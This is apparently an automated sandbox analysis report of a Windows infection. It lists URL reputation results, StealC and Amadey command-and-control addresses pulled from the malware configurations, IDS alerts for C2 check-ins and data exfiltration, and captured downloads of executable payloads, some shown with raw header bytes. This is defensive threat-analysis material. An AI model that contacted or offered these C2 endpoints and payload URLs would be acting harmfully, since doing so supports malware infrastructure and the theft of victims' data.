MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0080BE93
GetLastError.KERNEL32 ref: 0080BEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0080BEFC

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 5b20ceec94ca8c45f031a51d41ccca0ab30cbdb5266430fc90e3b1ca50e1797b
Instruction ID: cfdb275476a9d0a44ba3004cff8c298c765c8569eca1ad56f6ce9e2f18793321
Opcode Fuzzy Hash: 5b20ceec94ca8c45f031a51d41ccca0ab30cbdb5266430fc90e3b1ca50e1797b
Instruction Fuzzy Hash: 1341B13560420AAFCF618FA5CC48ABA7BA5FF42720F154169FA59DB2E1DF308D01CB60

Source: http://185.215.113.100/	URL Reputation: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php	URL Reputation: Label: malware
Source: http://185.215.113.100	URL Reputation: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpkD	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php-B	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php&DlR	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpG	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phptch	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/=g	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exeg	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpw	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exe6522	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php_D	Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/e2b1563c6670f193.php/5	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/well/random.exe	Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/e2b1563c6670f193.php/	Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpKBzS	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/	Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/e2b1563c6670f193.php2	Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php.ETS	Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/e2b1563c6670f193.php6	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exe	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php#A	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exe65	Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/t	Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php1E_S	Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/x	Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php_BfS	Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/w	Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpTD	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php0	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/fae1daa8e9eb0eefeb8846d934f48b15eaa495c49##Le	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php53001	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpW-jS	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpaB	Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/e2b1563c6670f193.php~	Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php000	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php~D	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpG-zS	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php.	Avira URL Cloud: Label: malware
Source: http://185.215.113.19/d5f9dd0246b5cb4f6522427fae1daa8e9eb0eefeb8846d934f48b15eaa495c49#0	Avira URL Cloud: Label: phishing

Source: 00000005.00000002.2189503708.000000000134E000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.100/e2b1563c6670f193.php"}
Source: explorti.exe.6488.4.memstrmin	Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}

Source: http://185.215.113.19/Vi9leo/index.phpG	Virustotal: Detection: 19%	Perma Link
Source: http://185.215.113.16/steam/random.exeg	Virustotal: Detection: 20%	Perma Link
Source: http://185.215.113.19/Vi9leo/index.php	Virustotal: Detection: 24%	Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.php/5	Virustotal: Detection: 18%	Perma Link
Source: http://185.215.113.16/well/random.exe	Virustotal: Detection: 25%	Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.php/	Virustotal: Detection: 7%	Perma Link
Source: http://185.215.113.19/	Virustotal: Detection: 18%	Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.php2	Virustotal: Detection: 10%	Perma Link
Source: http://185.215.113.16/steam/random.exe6522	Virustotal: Detection: 20%	Perma Link
Source: http://185.215.113.16/steam/random.exe	Virustotal: Detection: 23%	Perma Link
Source: http://185.215.113.19/Vi9leo/index.php#A	Virustotal: Detection: 24%	Perma Link
Source: http://185.215.113.100/x	Virustotal: Detection: 10%	Perma Link
Source: http://185.215.113.100/w	Virustotal: Detection: 10%	Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.php6	Virustotal: Detection: 8%	Perma Link
Source: http://185.215.113.19/Vi9leo/index.php0	Virustotal: Detection: 19%	Perma Link
Source: http://185.215.113.100/t	Virustotal: Detection: 10%	Perma Link

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49704 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.19:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49706 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49709 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49708 -> 185.215.113.100:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49716 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49732 -> 185.215.113.100:80

Source: Malware configuration extractor	URLs: http://185.215.113.100/e2b1563c6670f193.php
Source: Malware configuration extractor	IPs: 185.215.113.19

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 01 Sep 2024 04:28:03 GMTContent-Type: application/octet-streamContent-Length: 1771008Last-Modified: Sun, 01 Sep 2024 01:45:41 GMTConnection: keep-aliveETag: "66d3c745-1b0600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4d 8b c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 00 30 67 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 67 00 00 04 00 00 d3 4f 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 f0 23 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 23 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 23 00 00 10 00 00 00 3c 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 23 00 00 00 00 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 23 00 00 02 00 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 29 00 00 00 24 00 00 02 00 00 00 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6c 61 66 6c 64 78 71 00 90 19 00 00 90 4d 00 00 8e 19 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 67 6d 77 6c 74 68 75 00 10 00 00 00 20 67 00 00 06 00 00 00 de 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 67 00 00 22 00 00 00 e4 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 01 Sep 2024 04:28:10 GMTContent-Type: application/octet-streamContent-Length: 917504Last-Modified: Sun, 01 Sep 2024 04:16:44 GMTConnection: keep-aliveETag: "66d3eaac-e0000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a3 ea d3 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 50 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 56 80 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 c8 95 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c8 95 00 00 00 40 0d 00 00 96 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 8a 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View	IP Address: 185.215.113.100 185.215.113.100
Source: Joe Sandbox View	IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View	IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View	IP Address: 23.55.235.170 23.55.235.170

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49705 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49711 -> 185.215.113.16:80

Source: global traffic	HTTP traffic detected: GET /assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ArbitrationServiceSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveAccept: /Access-Control-Request-Method: POSTAccess-Control-Request-Headers: x-goog-authuserOrigin: https://accounts.google.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Sec-Fetch-Mode: corsSec-Fetch-Site: same-siteSec-Fetch-Dest: emptyReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9
Source: global traffic	HTTP traffic detected: OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveAccept: /Access-Control-Request-Method: POSTAccess-Control-Request-Headers: x-goog-authuserOrigin: https://accounts.google.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Sec-Fetch-Mode: corsSec-Fetch-Site: same-siteSec-Fetch-Dest: emptyReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.2045.47"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9
Source: global traffic	HTTP traffic detected: OPTIONS /api/report?cat=bingbusiness HTTP/1.1Host: bzib.nelreports.netConnection: keep-aliveOrigin: https://business.bing.comAccess-Control-Request-Method: POSTAccess-Control-Request-Headers: content-typeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/addressbar_uu_files.en-gb/1.0.2/asset?assetgroup=AddressBar HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: AddressBarSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=BtOHSlhmZvxL8lL&MD=NHFb+y1s HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ArbitrationServiceSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.2045.47"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=BtOHSlhmZvxL8lL&MD=NHFb+y1s HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /assets/addressbar_uu_files.en-gb/1.0.2/asset?assetgroup=AddressBar HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: AddressBarSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
